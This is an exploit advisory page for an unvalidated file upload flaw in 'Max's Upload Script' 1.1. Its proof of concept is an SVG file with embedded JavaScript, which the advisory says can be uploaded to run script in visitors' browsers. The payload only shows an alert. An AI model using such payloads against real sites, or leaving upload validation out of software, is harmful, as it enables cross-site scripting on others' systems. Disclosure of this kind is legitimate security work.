Max’s Upload Script unvaliated file upload Vulnerability

2018.01.22

IRANIAN ETHICAL HACKERS (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[+] Exploit Title ; Max’s Upload Script unvaliated file upload Vulnerability
[+] Date : 2018-01-22
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor HomePage : http://www.xscript.ir
[+] Dork : N/A
[+] Version : 1.1
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[*] Ajax File upload is a script for uploading file
[*] But there is no security in this script
[*] And You Can Upload Any File For Example svg files :
[*] You Can Use This Payload :
[+] Payload :
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert('Hacked bY : 0P3N3R');
</script>
</svg>
[+] Exploitation Technique:
[!] remote
[+] Severity Level:
[!] High
[+] We Are :
[!] 0P3N3R [+] Mehrdad_Ice [+] BaxTurk24 [+] S0hp

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Max’s Upload Script unvaliated file upload Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.